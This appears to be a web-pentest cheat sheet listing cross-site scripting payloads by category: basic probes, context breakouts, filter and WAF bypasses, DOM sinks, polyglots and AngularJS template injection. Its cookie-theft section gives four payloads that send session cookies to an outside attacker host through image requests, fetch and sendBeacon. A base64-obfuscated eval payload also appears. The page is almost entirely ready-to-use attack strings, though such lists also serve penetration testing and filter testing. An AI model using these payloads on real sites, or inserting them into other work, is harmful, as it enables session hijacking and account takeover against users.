web-pentest
XSS — Cross-Site Scripting Payloads
Cross-site scripting payloads — basic probes, attribute/context breakout, filter & WAF bypasses, DOM sinks, cookie exfiltration, polyglots and framework (Angular CSTI) injection.
Basic Probes (6)
<script>alert(1)</script>
Simplest XSS probe
<script>alert(document.domain)</script>
Confirm the execution origin
"><script>alert(1)</script>
Break out of an attribute, then inject
<img src=x onerror=alert(1)>
No <script> needed — image error handler
<svg onload=alert(1)>
SVG onload — short and reliable
<body onload=alert(1)>
Body load handler
Attribute & Context Breakout (5)
" onmouseover="alert(1)
Inject an event handler inside an attribute
'><svg/onload=alert(1)>
Break a single-quote attribute, then SVG
" autofocus onfocus=alert(1) x="
Auto-trigger via autofocus + onfocus
</textarea><script>alert(1)</script>
Escape a <textarea> context
';alert(1)//
Break out of an inline JS string context
Filter / WAF Bypass (6)
<svG OnLoaD=alert(1)>
Mixed case to dodge tag/attribute filters
<img src=x onerror="alert`1`">
Backticks instead of parentheses
<svg onload=alert(1)>
HTML-entity-encoded parentheses
<scr<script>ipt>alert(1)</scr</script>ipt>
Nested tags survive naive tag stripping
<img src=x onerror=eval(atob('YWxlcnQoMSk='))>
Base64 payload via atob + eval
<iframe src=javascript:alert(1)>
javascript: URI inside an iframe
DOM-Based Sinks (4)
#<img src=x onerror=alert(1)>
location.hash flowing into innerHTML
javascript:alert(document.cookie)
href / location assignment sink
<a href="javascript:alert(1)">x</a>
User-triggered DOM execution
"><img src=x onerror=alert(1)>
Reflected into a DOM sink after breakout
Cookie Theft / Exfiltration (4)
<script>new Image().src='http://10.10.14.1/?c='+document.cookie</script>
Exfil cookies via an image request
<script>fetch('http://10.10.14.1/?c='+document.cookie)</script>
Exfil via fetch
<script>navigator.sendBeacon('http://10.10.14.1',document.cookie)</script>
Beacon exfil (fires even on unload)
<img src=x onerror="this.src='http://10.10.14.1/?'+document.cookie">
Cookie exfil without a <script> tag
Polyglots & Framework Injection (4)
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtArEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>
0xsobky all-context XSS polyglot
{{constructor.constructor('alert(1)')()}}
AngularJS client-side template injection
{{$on.constructor('alert(1)')()}}
AngularJS CSTI variant
<x contenteditable onbeforeinput=alert(1)>
Newer event handler (filter gaps)
Related Articles
5
Web Hacking
JSON and YAML Unsafe Deserialization
Deep technical analysis of insecure deserialization across Java, PHP, Python, and Node.js …
Web Hacking
Supply Chain Attacks
Deep technical guide to software supply chain attacks — dependency confusion, malicious np…
Web Hacking
Cross-Site Scripting Mastery
Complete XSS guide covering all attack types, filter bypasses, CSP evasion, cookie stealin…
Web Hacking
File Upload to RCE
Complete file upload exploitation guide — MIME bypass, double extension tricks, polyglot J…
Web Hacking
Advanced SSRF
Complete SSRF exploitation guide — AWS IMDSv1/v2 credential theft, GCP/Azure metadata, bli…
